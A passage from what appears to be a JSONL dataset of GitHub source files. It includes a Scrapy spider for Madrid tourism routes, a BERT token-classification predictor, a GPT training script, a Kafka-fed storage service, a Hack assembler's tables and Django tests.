Join.objects.all()\n serializer_class = JoinSerializer\n\n\ndef _data_source_to_dict(data_source: DataSource, scout: data_scout.scout.Scout):\n \"\"\"\n Convert a data source object to a dictionary.\n\n :param data_source: The data source to convert\n :param scout: An initialized data scout Scout object\n :return:\n \"\"\"\n data_source = {\"source\": data_source.source, \"kwargs\": json.loads(data_source.kwargs)}\n ds = scout.get_data_source(data_source[\"source\"])\n for field_name, field in ds.fields.items():\n if field[\"type\"] == \"file\":\n user_file = UserFile.objects.get(pk=data_source[\"kwargs\"][field_name])\n data_source[\"kwargs\"][field_name] = os.path.join(settings.MEDIA_ROOT, user_file.file_name)\n return data_source\n\n\ndef _data_source_to_pipeline(data_source: DataSource, scout: data_scout.scout.Scout, use_sample=True, column_types=True,\n sampling_technique: str = 'top'):\n \"\"\"\n Convert a data source to a pipeline element.\n\n :param data_source: The data source to convert\n :param scout: An initialized data scout Scout object\n :param use_sample: If True sample the dataset, if False use all data.\n :param column_types: If True return the column types as well (more overhead), if False then don't include them\n :param sampling_technique: The sampling technique to use\n :return:\n \"\"\"\n # data_source = get_object_or_404(DataSource, pk=data_source)\n return {\n \"use_sample\": use_sample,\n \"sampling_technique\": sampling_technique,\n \"column_types\": column_types,\n \"data_source\": _data_source_to_dict(data_source, scout),\n \"pipeline\": []\n }\n\n\n\n","repo_name":"janthiemen/data_scout_server","sub_path":"backend/apps/scout/views/datasources.py","file_name":"datasources.py","file_ext":"py","file_size_in_byte":8004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43067129931","text":"import scrapy\nimport re\nfrom scrapy import Request\nfrom prueba.items import ItinerarioItem\n\n\nclass MadridRoutesSpider(scrapy.Spider):\n name = \"madrid_routes\"\n\n BASE_URL = \"https://turismomadrid.es\"\n ROUTES_URL = BASE_URL + \"/es/rutas.html\"\n ALL_DB = False\n\n custom_settings = {\n \"ITEM_PIPELINES\": {\"prueba.pipelines.ElasticsearchPipeline\": 300},\n \"CONCURRENT_REQUESTS\": 8,\n }\n\n def start_requests(self):\n req = Request(\n url=self.ROUTES_URL,\n callback=self.parse_etapas,\n )\n yield req\n\n def parse_etapas(self, response):\n etapas = response.xpath(\n '//div[@id=\"region3wrap\"]//div//a[contains(@href,\"rutas\")]/@href'\n ).getall()\n\n if self.ALL_DB:\n for etapa in etapas:\n req = Request(\n url=self.BASE_URL + etapa,\n callback=self.parse_etapa,\n )\n yield req\n else:\n req = Request(\n url=self.BASE_URL + etapas[0],\n callback=self.parse_etapa,\n )\n yield req\n\n def parse_etapa(self, response):\n main_etapa_title = response.xpath('//h1[@class=\"titulo-etapa\"]/text()').get()\n main_etapa_description = response.xpath(\n '//div[contains(@class,\"descripcion-etapa\")]/p/text()'\n ).get()\n main_etapa_image = response.xpath(\n '//div[contains(@class,\"descripcion-etapa\")]/../div/img/@src'\n ).get()\n main_etapa_distance = response.xpath(\n '//div[contains(@class,\"dato-etapa\")]/span/../..//span[contains(text(),\"KM\")]/text()'\n ).get()\n main_etapa_total_routes = response.xpath(\n '//div[contains(@class,\"dato-etapa\")]/span/../..//span[contains(text(),\"etapa\")]/text()'\n ).get()\n main_etapa_duration = response.xpath(\n '//div[contains(@class,\"dato-etapa\")]/span/../..//span[contains(text(),\"h\")]/text()'\n ).get()\n gpx_link = (\n self.BASE_URL\n + response.xpath(\n '//a[contains(@class,\"download\")]/../a[contains(text(),\"GPX\")]/@href'\n ).get()\n )\n kmz_link = (\n self.BASE_URL\n + response.xpath(\n '//a[contains(@class,\"download\")]/../a[contains(text(),\"KMZ\")]/@href'\n ).get()\n )\n\n main_etapa_details = {\n \"main_etapa_title\": main_etapa_title,\n \"main_etapa_description\": main_etapa_description,\n \"main_etapa_image\": main_etapa_image,\n \"main_etapa_distance\": main_etapa_distance,\n \"main_etapa_total_routes\": main_etapa_total_routes,\n \"main_etapa_duration\": main_etapa_duration,\n \"gpx_link\": gpx_link,\n \"kmz_link\": kmz_link,\n }\n mainEtapa = {\n \"id\": main_etapa_title,\n \"object\": \"main_etapa\",\n \"details\": main_etapa_details,\n }\n yield ItinerarioItem(mainEtapa)\n\n rutas = response.xpath(\n '//div[@id=\"region3wrap\"]//div//a[contains(@href,\"rutas\")]/@href'\n ).getall()\n\n if self.ALL_DB:\n for route in rutas:\n req = Request(\n url=self.BASE_URL + route,\n callback=self.parse_routes,\n )\n req.meta[\"_main_etapa_details\"] = main_etapa_details\n yield req\n else:\n req = Request(\n url=self.BASE_URL + rutas[0],\n callback=self.parse_routes,\n )\n req.meta[\"_main_etapa_details\"] = main_etapa_details\n yield req\n\n def parse_routes(self, response):\n main_etapa_details = response.meta[\"_main_etapa_details\"]\n main_etapa_title = main_etapa_details[\"main_etapa_title\"]\n\n route_number = response.xpath('//h3[@class=\"etapa-titulo\"]/text()').get()\n route_name = response.xpath('//h1[@class=\"nivel2-titulo\"]/text()').get()\n route_description_all = response.xpath(\n '//div[contains(@class,\"descripcion-etapa\")]/p/text()'\n ).getall()\n route_description = \" \".join(route_description_all)\n gpx_link = (\n self.BASE_URL\n + response.xpath(\n '//a[contains(@class,\"download\")]/../a[contains(text(),\"GPX\")]/@href'\n ).get()\n )\n kmz_link = (\n self.BASE_URL\n + response.xpath(\n '//a[contains(@class,\"download\")]/../a[contains(text(),\"KMZ\")]/@href'\n ).get()\n )\n\n route_details = {\n \"route_number\": route_number,\n \"route_name\": route_name,\n \"route_description\": route_description,\n \"gpx_link\": gpx_link,\n \"kmz_link\": kmz_link,\n }\n\n routeDetails = {\n \"id\": main_etapa_title + \"_\" + route_number,\n \"object\": \"route_details\",\n \"details\": route_details,\n }\n yield ItinerarioItem(routeDetails)\n\n itinerarios = response.xpath(\n '//div[@id=\"region3wrap\"]//div//a[contains(@href,\"etapa\")]/@href'\n ).getall()\n if self.ALL_DB:\n for route in itinerarios:\n req = Request(\n url=self.BASE_URL + route,\n callback=self.parse_itinerarios,\n )\n req.meta[\"_main_etapa_details\"] = main_etapa_details\n req.meta[\"_route_details\"] = route_details\n yield req\n else:\n req = Request(\n url=self.BASE_URL + itinerarios[0],\n callback=self.parse_itinerarios,\n )\n req.meta[\"_main_etapa_details\"] = main_etapa_details\n req.meta[\"_route_details\"] = route_details\n yield req\n\n def parse_itinerarios(self, response):\n main_etapa_details = response.meta[\"_main_etapa_details\"]\n route_details = response.meta[\"_route_details\"]\n\n main_etapa_title = main_etapa_details[\"main_etapa_title\"]\n route_number = route_details[\"route_number\"]\n\n itinerary_title = response.xpath('//h1[@class=\"nivel2-titulo\"]/text()').get()\n itinerary_distance = response.xpath(\n '//div[contains(@class, \"distancia-ruta\")]//span/text()'\n ).get()\n itinerary_details = response.xpath(\n '//div[contains(@class,\"descripcion-etapa\")]/p/text()'\n ).getall()\n itinerary_description = itinerary_details[0]\n itinerary_path = itinerary_details[1]\n\n step_by_step = response.xpath(\n '//div[contains(@class,\"large-bottom\")]/div/div/../../div'\n )\n\n stepsList = []\n for step in step_by_step:\n step_name = step.xpath('.//div[@id=\"texto\"]//text()').get()\n step_description = step.xpath(\n './/div[contains(@class,\"descripcion-etapa\")]/p[1]/text()'\n ).get()\n image_long = step.xpath(\n './/div[contains(@style,\"background-image\")]/@style'\n ).get()\n if image_long is not None:\n image_link = re.search(\"(?Phttps?://[^\\s]+)\", image_long).group(\n \"url\"\n )\n else:\n image_link = \"\"\n stepObject = {\n \"step_name\": step_name,\n \"step_description\": step_description,\n \"image_link\": image_link,\n }\n stepsList.append(stepObject)\n\n itinerario_info = {\n \"itinerary_title\": itinerary_title,\n \"itinerary_distance\": itinerary_distance,\n \"itinerary_description\": itinerary_description,\n \"itinerary_path\": itinerary_path,\n \"step_by_step\": stepsList,\n }\n\n itinerarioDetails = {\n \"id\": main_etapa_title + \"_\" + route_number + \"_\" + itinerary_title,\n \"object\": \"itinerario_details\",\n \"details\": itinerario_info,\n }\n yield ItinerarioItem(itinerarioDetails)\n","repo_name":"fjmaco/madridRoutesScraping","sub_path":"prueba/prueba/spiders/turismomadrid.py","file_name":"turismomadrid.py","file_ext":"py","file_size_in_byte":8068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12125813855","text":"\nopcao = int(input(\"Digite a quantidade de números que quer saber da série de Fibonacci: \"))\nanterior = 0\nproximo = 0\n\nwhile(opcao > 0):\n print(proximo)\n opcao = opcao -1\n\n proximo = proximo + anterior\n anterior = proximo - anterior\n if(proximo == 0):\n proximo = proximo + 1 ","repo_name":"TheMarcelin/Python","sub_path":"Q6.1.py","file_name":"Q6.1.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34557142768","text":"import json\nimport logging\nfrom argparse import ArgumentParser, Namespace\nfrom pathlib import Path\nfrom typing import Dict, List\nimport csv\nimport numpy as np\n\nimport torch\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm\n\nfrom accelerate import Accelerator\nimport transformers\nfrom transformers import (\n PreTrainedModel,\n AutoConfig,\n AutoModelForTokenClassification,\n AutoTokenizer,\n get_scheduler,\n)\n\nfrom dataset import SeqTaggingClsDataset\nfrom utils import same_seed\n\n@torch.no_grad()\ndef predict(model:PreTrainedModel,\n dataloader: DataLoader,\n idx2tag\n ):\n model.eval()\n test_ids: List[str] = []\n all_preds: List[List[int]] = []\n test_pbar = tqdm(dataloader, position=0, leave=True) \n\n for _, batch in enumerate(test_pbar):\n ids = batch.pop('ids')\n labels = batch.pop('labels')\n outputs = model(**batch)\n # preds size -> (Batch, Seq_len)\n preds = outputs.logits.argmax(dim=-1)\n # Remove ignored index (special tokens)\n true_predictions = [\n ' '.join([idx2tag[int(p)] for (p, l) in zip(prediction, label) if l != -100])\n for prediction, label in zip(preds, labels)\n ]\n test_ids.extend(ids)\n all_preds.extend(true_predictions)\n\n return all_preds, test_ids\n\ndef main(args):\n # TODO: implement main function\n same_seed(12345)\n\n # Initialize the accelerator. We will let the accelerator handle device placement for us in this example.\n global accelerator\n accelerator = Accelerator()\n\n tag_idx_path = args.cache_dir / \"tag2idx.json\"\n tag2idx: Dict[str, int] = json.loads(tag_idx_path.read_text())\n idx2tag = {v: k for k, v in tag2idx.items()}\n\n config = AutoConfig.from_pretrained(args.model_dir, id2label=idx2tag)\n tokenizer = AutoTokenizer.from_pretrained(args.model_dir, do_lower_case=True)\n model = AutoModelForTokenClassification.from_pretrained(args.model_dir, config=config)\n\n data = json.loads(args.test_path.read_text())\n dataset = SeqTaggingClsDataset(data, tokenizer, tag2idx, args.max_len, False)\n # TODO: crecate DataLoader for test dataset\n dataloader = DataLoader(dataset=dataset,\n batch_size=args.batch_size,\n pin_memory=False,\n shuffle=False,\n collate_fn=dataset.collate_fn\n )\n # Prepare everything with our accelerator.\n model, test_dataloader = accelerator.prepare(\n model, dataloader\n )\n logging.info(\"\\n******** Running predicting ********\")\n logging.info(f\"Num test examples = {len(dataset)}\")\n # TODO: predict dataset\n true_predictions, test_ids = predict(model, test_dataloader, idx2tag)\n\n # TODO: write prediction to file (args.pred_file)\n with open(args.pred_file , 'w', encoding='utf-8', newline='')as file:\n csvWriter = csv.writer(file)\n csvWriter.writerow(['id', 'tags'])\n for test_id, pred in zip(test_ids, true_predictions):\n csvWriter.writerow([test_id, pred])\n\ndef parse_args() -> Namespace:\n parser = ArgumentParser()\n parser.add_argument(\n \"--test_path\",\n type=Path,\n help=\"Path to the test file.\",\n default=\"./data/slot/test.json\"\n )\n parser.add_argument(\n \"--cache_dir\",\n type=Path,\n help=\"Directory to the preprocessed caches.\",\n default=\"./cache/slot/\",\n )\n parser.add_argument(\n \"--ckpt_path\",\n type=Path,\n help=\"Path to model checkpoint.\",\n default=\"./ckpt/slot/\",\n required=False\n )\n parser.add_argument(\"--pred_file\", type=Path, default=\"slot.csv\")\n\n # data\n parser.add_argument(\"--max_len\", type=int, default=32)\n\n\n # data loader\n parser.add_argument(\"--batch_size\", type=int, default=4)\n\n parser.add_argument(\n \"--device\", type=torch.device, help=\"cpu, cuda, cuda:0, cuda:1\", default=\"cuda:0\"\n )\n # which model\n parser.add_argument(\"--model_dir\", type=str, default=\"bert-base-uncased\")\n\n args = parser.parse_args()\n return args\n\nif __name__ == \"__main__\":\n args = parse_args()\n main(args)\n\n# python ./test_slot.py --test_file ./data/slot/test.json --ckpt_path ckpt/slot/best_slot.pt --pred_file ./pred/slot --hidden_size 512 --init_weights normal --model_name gru\n# bash ./slot_tag.sh ./data/slot/test.json ./pred/slot ","repo_name":"RobertChienShiba/2022-Fall-ADL","sub_path":"HW1_BERT/test_slot.py","file_name":"test_slot.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32535301216","text":"import contextlib\nimport math\nimport time\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom dataset import TokenDataset\nfrom model import GPT\n\n\nclass CosineAnealingLR:\n def __init__(self, optim: torch.optim.Optimizer, lr: float, n_iters: int, n_warmup: int = 0) -> None:\n self.optim = optim\n self.lr = lr\n self.n_iters = n_iters\n self.n_warmup = n_warmup\n\n def set_lr(self, iter: int) -> float:\n if iter < self.n_warmup:\n lr = 0.1 * self.lr + 0.9 * self.lr * iter / self.n_warmup\n else:\n ratio = min((iter - self.n_warmup) / (self.n_iters - self.n_warmup), 1)\n lr = 0.01 * self.lr + 0.5 * 0.99 * self.lr * (1 + math.cos(ratio * math.pi))\n\n for grp in self.optim.param_groups:\n grp[\"lr\"] = lr\n return lr\n\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nfp16 = device == \"cuda\"\ngrad_accumulation = 2\nbatch_size = 64\nlr = 3e-3\nwd = 1e-1\n\n# Chinchilla: https://arxiv.org/abs/2203.15556\nvocab_size = 8000\ncontext_length = 1024\nd_model = 512\nn_heads = 8\nn_layers = 8\n\nn_iters = 100_000\nn_warmup = 1000\n\nmodel = GPT(vocab_size, context_length, d_model, n_heads, n_layers).to(device)\nmodel: GPT = torch.compile(model)\ntrain_ds = TokenDataset(\"tiny_stories_train.bin\", context_length, device=device)\nvalid_ds = TokenDataset(\"tiny_stories_valid.bin\", context_length, 1, device)\n\noptim = model.configure_optimizer(lr, wd, (0.9, 0.95))\nlr_scheduler = CosineAnealingLR(optim, lr, n_iters, n_warmup)\nfp16_ctx = torch.autocast(device, torch.float16) if fp16 else contextlib.nullcontext()\nscaler = torch.cuda.amp.grad_scaler.GradScaler(enabled=fp16)\n\nn_tokens_per_iter = context_length * batch_size * grad_accumulation\nprint(f\"No. of tokens per iteration: {n_tokens_per_iter:,}\")\n\ntrain_batches = iter(DataLoader(train_ds, batch_size))\ninputs, targets = next(train_batches)\n\niter_idx = 0\ntime0 = time.time()\nlog_interval = 10\nwhile True:\n _lr = lr_scheduler.set_lr(iter_idx)\n for i in range(grad_accumulation):\n with fp16_ctx:\n loss = model(inputs, targets) / grad_accumulation\n inputs, targets = next(train_batches)\n scaler.scale(loss).backward()\n\n scaler.step(optim)\n scaler.update()\n optim.zero_grad(True)\n\n if iter_idx % log_interval == 0:\n time1 = time.time()\n speed = log_interval / (time1 - time0)\n time0 = time1\n print(f\"Iter {iter_idx} - lr {_lr:.3e} | {speed:.2f} it/s | loss {loss.item() * grad_accumulation:.3e}\")\n\n iter_idx += 1\n if iter_idx > n_iters:\n break\n\ntorch.save(model.state_dict(), \"model.pth\")\n","repo_name":"gau-nernst/gpt","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26547735062","text":"import connexion\nfrom connexion import NoContent\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import and_\nfrom base import Base\nfrom meal_calories import MealCalories\nfrom user_weight import UserWeight\nimport datetime\n# import mysql-connector-python\nimport pymysql\nimport yaml\nimport logging\nimport logging.config\nimport time\n\nimport json\nfrom pykafka import KafkaClient\nfrom pykafka.common import OffsetType\nfrom threading import Thread\nimport os\n\nif \"TARGET_ENV\" in os.environ and os.environ[\"TARGET_ENV\"] == \"test\":\n print(\"In Test Environment\")\n app_conf_file = \"/config/app_conf.yml\"\n log_conf_file = \"/config/log_conf.yml\"\nelse:\n print(\"In Dev Environment\")\n app_conf_file = \"app_conf.yml\"\n log_conf_file = \"log_conf.yml\"\n\nwith open(app_conf_file, \"r\") as f:\n app_config = yaml.safe_load(f.read())\n\nwith open(log_conf_file, 'r') as f:\n log_config = yaml.safe_load(f.read())\n logging.config.dictConfig(log_config)\n\nlogger = logging.getLogger('basicLogger')\n\nlogger.info(\"App Conf File: %s\" % app_conf_file)\nlogger.info(\"Log Conf File: %s\" % log_conf_file)\n\nuser = app_config['datastore']['user']\npassword = app_config['datastore']['password']\nhostname = app_config['datastore']['hostname']\nport = app_config['datastore']['port']\ndb = app_config['datastore']['db']\n\nDB_ENGINE = create_engine(f'mysql+pymysql://{user}:{password}@{hostname}:{port}/{db}')\nBase.metadata.bind = DB_ENGINE\nDB_SESSION = sessionmaker(bind=DB_ENGINE)\n\nlogger.info(f\"Connecting to DB. Hostname: {hostname}, Port: {port}\")\n\n# Your functions here\n# def meal_calories(body):\n# session = DB_SESSION()\n\n# mc = MealCalories(body['user_id'],\n# body['calorie_count'],\n# body['meal_name'],\n# body['meal_number'],\n# body['timestamp'],\n# body['trace_id'])\n\n# session.add(mc)\n# session.commit()\n# session.close()\n\n# logger.debug(f'Stored event meal_calories request with a trace_id of {body[\"trace_id\"]}')\n\n# return NoContent, 201\n\n# def user_weight(body):\n# session = DB_SESSION()\n\n# uw = UserWeight(body['user_id'],\n# body['weight_kg'],\n# body['weight_lbs'],\n# body['timestamp'],\n# body['trace_id'])\n\n# session.add(uw)\n# session.commit()\n# session.close()\n\n# logger.debug(f'Stored event user_weight request with a trace_id of {body[\"trace_id\"]}')\n\n# return NoContent, 201\n\ndef get_meal_calories(timestamp, end_timestamp):\n\n session = DB_SESSION()\n timestamp_datetime = datetime.datetime.strptime(timestamp, \"%Y-%m-%dT%H:%M:%SZ\")\n end_timestamp = datetime.datetime.strptime(end_timestamp, \"%Y-%m-%dT%H:%M:%SZ\")\n readings = session.query(MealCalories).filter(MealCalories.date_created >= timestamp_datetime,\n MealCalories.date_created < end_timestamp)\n\n results_list = []\n\n for reading in readings:\n results_list.append(reading.to_dict())\n \n session.close()\n\n logger.info(\"Query for Meal Calories after %s returns %d results\" % (timestamp, len(results_list)))\n\n return results_list, 200\n\ndef get_user_weight(timestamp, end_timestamp):\n\n session = DB_SESSION()\n timestamp_datetime = datetime.datetime.strptime(timestamp, \"%Y-%m-%dT%H:%M:%SZ\")\n end_timestamp = datetime.datetime.strptime(end_timestamp, \"%Y-%m-%dT%H:%M:%SZ\")\n readings = session.query(UserWeight).filter(UserWeight.date_created >= timestamp_datetime,\n UserWeight.date_created < end_timestamp)\n readings = session.query(UserWeight).filter(UserWeight.date_created >= timestamp_datetime)\n\n results_list = []\n\n for reading in readings:\n results_list.append(reading.to_dict())\n \n session.close()\n\n logger.info(\"Query for User Weight after %s returns %d results\" % (timestamp, len(results_list)))\n\n return results_list, 200\n\ndef process_messages():\n \"\"\" Process event messages \"\"\"\n hostname = \"%s:%d\" % (app_config[\"events\"][\"hostname\"], app_config[\"events\"][\"port\"])\n retries = app_config['retries']['max']\n wait_time = app_config['retries']['sleep']\n counter = 0\n\n while counter < retries:\n logger.info(f'Trying to connect to Kafka, try number {counter}')\n try:\n client = KafkaClient(hosts=hostname)\n topic = client.topics[str.encode(app_config[\"events\"][\"topic\"])]\n # Create a consume on a consumer group, that only reads new messages\n # (uncommitted messages) when the service re-starts (i.e., it doesn't\n # read all the old messages from the history in the message queue).\n consumer = topic.get_simple_consumer(consumer_group=b'event_group',\n reset_offset_on_start=False,\n auto_offset_reset=OffsetType.LATEST)\n # This is blocking - it will wait for a new message\n for msg in consumer:\n msg_str = msg.value.decode('utf-8')\n msg = json.loads(msg_str)\n logger.info(\"Message: %s\" % msg)\n payload = msg[\"payload\"]\n if msg[\"type\"] == \"calories\": # Change this to your event type\n # Store the event1 (i.e., the payload) to the DB\n session = DB_SESSION()\n mc = MealCalories(payload['user_id'],\n payload['calorie_count'],\n payload['meal_name'],\n payload['meal_number'],\n payload['timestamp'],\n payload['trace_id'])\n session.add(mc)\n session.commit()\n session.close()\n elif msg[\"type\"] == \"weight\": # Change this to your event type\n # Store the event2 (i.e., the payload) to the DB\n # Commit the new message as being read\n session = DB_SESSION()\n uw = UserWeight(payload['user_id'],\n payload['weight_kg'],\n payload['weight_lbs'],\n payload['timestamp'],\n payload['trace_id'])\n session.add(uw)\n session.commit()\n session.close()\n consumer.commit_offsets()\n # break\n except:\n logger.error('Error while trying to connect to Kafka')\n counter += 1\n time.sleep(wait_time)\n\ndef get_health():\n return 200\n \n\n\napp = connexion.FlaskApp(__name__, specification_dir='')\napp.add_api(\"openapi.yaml\", base_path=\"/storage\", strict_validation = True, validate_responses = True)\n\nif __name__ == \"__main__\":\n t1 = Thread(target=process_messages)\n t1.setDaemon(True)\n t1.start()\n app.run(port=8090)\n","repo_name":"drinkwater0502/ACIT_3855","sub_path":"Storage/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28514845941","text":"from tkinter import *\nimport tkinter\nfrom PIL import ImageTk,Image\n\n\nws = Tk()\nws.title('English to English Dictionary')\nws.geometry('680x840')\nws.resizable(False,False)\nws.iconbitmap('images/world.ico')\ntext=\"\"\"\nhi\n\"\"\"\n\n\ndef get():\n text_box.insert(END,\"\"\"\n s\n\n\n\n\n sss\n ss\n\n sssss\n\n\n\n\n\n\n\n\n\n\n\n\n ssss\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \"\"\")\n\n \n \n \n\n\ntext_box = Text(\nws,\nheight=10,\nwidth=10,\nwrap='word',\nfg=\"black\",\n\nfont=(\"helvatica\",13)\n\n)\n\n\ntext_box.pack()\nbutton=Button(ws,text=\"submit\",command=lambda:get(),font=(\"helvatica\",10))\nbutton.pack()\n\nws.mainloop()","repo_name":"vps4618/Tkinter_Codemy","sub_path":"testing_dictionary.py","file_name":"testing_dictionary.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1573610972","text":"CompTable = {\n \"0\" :\"0101010\",\n \"1\" :\"0111111\",\n \"-1\" :\"0111010\",\n \"D\" :\"0001100\",\n \"A\" :\"0110000\",\n \"!D\" :\"0001101\",\n \"-D\" :\"0001111\",\n \"-A\" :\"0110011\",\n \"D+1\" :\"0011111\",\n \"A+1\" :\"0110111\",\n \"D-1\" :\"0001110\",\n \"A-1\" :\"0110010\",\n \"D+A\" :\"0000010\",\n \"D-A\" :\"0010011\",\n \"A-D\" :\"0000111\",\n \"D&A\" :\"0000000\",\n \"D|A\" :\"0010101\",\n \"M\" :\"1110000\",\n \"!M\" :\"1110001\",\n \"-M\" :\"1110011\",\n \"M+1\" :\"1110111\",\n \"M-1\" :\"1110010\",\n \"D+M\" :\"1000010\",\n \"D-M\" :\"1010011\",\n \"M-D\" :\"1000111\",\n \"D&M\" :\"1000000\",\n \"D|M\" :\"1010101\"\n}\n\nDestTable = {\n \"M\" :\"001\",\n \"D\" :\"010\",\n \"MD\" :\"011\",\n \"A\" :\"100\",\n \"AM\" :\"101\",\n \"AD\" :\"110\",\n \"AMD\" :\"111\"\n}\n\nJumpTable = {\n \"JGT\" :\"001\",\n \"JEQ\" :\"010\",\n \"JGE\" :\"011\",\n \"JLT\" :\"100\",\n \"JNE\" :\"101\",\n \"JLE\" :\"110\",\n \"JMP\" :\"111\"\n}\n\nSymbolTable = {\n \"SP\" :\"0\",\n \"LCL\" :\"1\",\n \"ARG\" :\"2\",\n \"THIS\" :\"3\",\n \"THAT\" :\"4\",\n \"R0\" :\"0\",\n \"R1\" :\"1\",\n \"R2\" :\"2\",\n \"R3\" :\"3\",\n \"R4\" :\"4\",\n \"R5\" :\"5\",\n \"R6\" :\"6\",\n \"R7\" :\"7\",\n \"R8\" :\"8\",\n \"R9\" :\"9\",\n \"R10\" :\"10\",\n \"R11\" :\"11\",\n \"R12\" :\"12\",\n \"R13\" :\"13\",\n \"R14\" :\"14\",\n \"R15\" :\"15\",\n \"SCREEN\":\"16384\",\n \"KBD\" :\"24576\"\n}\n\nvariableSymbol_Value = 16\n\ndef isWhitespace(line):\n i=0\n while(i None:\n super().setUpClass()\n cls.group = Group.objects.create(\n title='Тестовая группа',\n slug='test-slug',\n description='Тестовое описание'\n )\n cls.small_gif = (\n b'\\x47\\x49\\x46\\x38\\x39\\x61\\x01\\x00\\x01\\x00\\x00\\x00\\x00\\x21\\xf9\\x04'\n b'\\x01\\x0a\\x00\\x01\\x00\\x2c\\x00\\x00\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x02'\n b'\\x02\\x4c\\x01\\x00\\x3b'\n )\n\n @classmethod\n def tearDownClass(cls):\n super().tearDownClass()\n shutil.rmtree(TEMP_MEDIA_ROOT, ignore_errors=True)\n\n def setUp(self):\n self.guest_client = Client()\n self.user = User.objects.create_user(username=self.AUTHOR_NAME)\n self.authorized_client = Client()\n self.authorized_client.force_login(self.user)\n\n def test_author_create_post(self):\n \"\"\"При отправке валидной формы со страницы создания поста\n reverse('posts:post_create') создаётся новая запись в базе данных\"\"\"\n uploaded = SimpleUploadedFile(\n name='small.gif',\n content=self.small_gif,\n content_type='image/gif'\n )\n form_data = {\n 'text': 'Тестовое сообщение',\n 'group': self.group.id,\n 'image': uploaded,\n }\n response = self.authorized_client.post(\n reverse('posts:post_create'),\n data=form_data,\n follow=True\n )\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(Post.objects.count(), 1)\n post = Post.objects.last()\n self.assertEqual(post.text, 'Тестовое сообщение')\n self.assertEqual(post.author, self.user)\n self.assertEqual(post.group, self.group)\n self.assertEqual(post.image, 'posts/small.gif')\n\n def test_author_edit_group_and_text_of_self_post(self):\n \"\"\"При отправке валидной формы со страницы редактирования поста\n reverse('posts:post_edit') происходит изменение поста с post_id\n в базе данных\"\"\"\n post = Post.objects.select_related('author', 'group').create(\n text='Тестовое сообщение',\n author=self.user,\n group=self.group,\n )\n group2 = Group.objects.create(\n title='Тестовая группа 2',\n slug='test-slug-2',\n description='Тестовое описание 2'\n )\n uploaded = SimpleUploadedFile(\n name='small2.gif',\n content=self.small_gif,\n content_type='image/gif'\n )\n posts_count = Post.objects.count()\n reverse_name = reverse('posts:post_edit',\n kwargs={'post_id': post.id})\n\n response = self.authorized_client.get(reverse_name)\n\n form_data = {\n 'text': 'Обновленное сообщение',\n 'group': group2.id,\n 'image': uploaded,\n }\n\n response = self.authorized_client.post(\n reverse_name,\n data=form_data,\n follow=True,\n )\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(Post.objects.count(), posts_count)\n post = Post.objects.last()\n self.assertEqual(post.text, 'Обновленное сообщение')\n self.assertEqual(post.group, group2)\n self.assertEqual(post.author, self.user)\n self.assertEqual(post.image, 'posts/small2.gif')\n self.assertFalse(Post.objects.filter(\n group=self.group, id=post.id).exists())\n\n def test_after_successfull_send_comment_on_page_of_post(self):\n \"\"\"Проверка, что после успешной отправки комментарий\n появляется на странице поста\"\"\"\n post = Post.objects.select_related('author', 'group').create(\n text='Тестовое сообщение',\n author=self.user,\n )\n reverse_name = reverse('posts:add_comment',\n kwargs={'post_id': post.id})\n\n form_data = {\n 'text': 'Тестовой коментарий',\n }\n\n response = self.authorized_client.post(\n reverse_name,\n data=form_data,\n follow=True,\n )\n\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(Comment.objects.count(), 1)\n comment = Comment.objects.last()\n self.assertEqual(comment.text, 'Тестовой коментарий')\n self.assertEqual(comment.post, post)\n self.assertEqual(comment.author, self.user)\n\n def test_only_authorized_user_can_comment_on_post(self):\n \"\"\"Проверка комментировать посты может только\n авторизованный пользователь\"\"\"\n post = Post.objects.select_related('author', 'group').create(\n text='Тестовое сообщение',\n author=self.user,\n )\n reverse_name = reverse('posts:add_comment',\n kwargs={'post_id': post.id})\n\n response = self.authorized_client.post(\n reverse_name,\n data={'text': 'Комментарий авторизированного пользователя'},\n follow=True,\n )\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(Comment.objects.count(), 1)\n\n response = self.guest_client.post(\n reverse_name,\n data={'text': 'Комментарий гостевого пользователя'},\n follow=True,\n )\n self.assertEqual(response.status_code, HTTPStatus.OK)\n self.assertEqual(Comment.objects.count(), 1)\n","repo_name":"AndreyZyuzin/hw05_final","sub_path":"yatube/posts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":6607,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13749220743","text":"from django.urls import path\n\nfrom todo.views import *\napp_name = 'todo'\n\nurlpatterns = [\n path('', TaskListView.as_view(), name='task_list'),\n path('category/', CategoryListView.as_view(), name='category_list'),\n path('task/new/', TaskCreateView.as_view(), name='task_new'),\n path('task//', TaskDetailView.as_view(), name='task_detail'),\n path('category/new/', CategoryCreateView.as_view(), name='category_new'),\n path('category//', CategoryDetailView.as_view(), 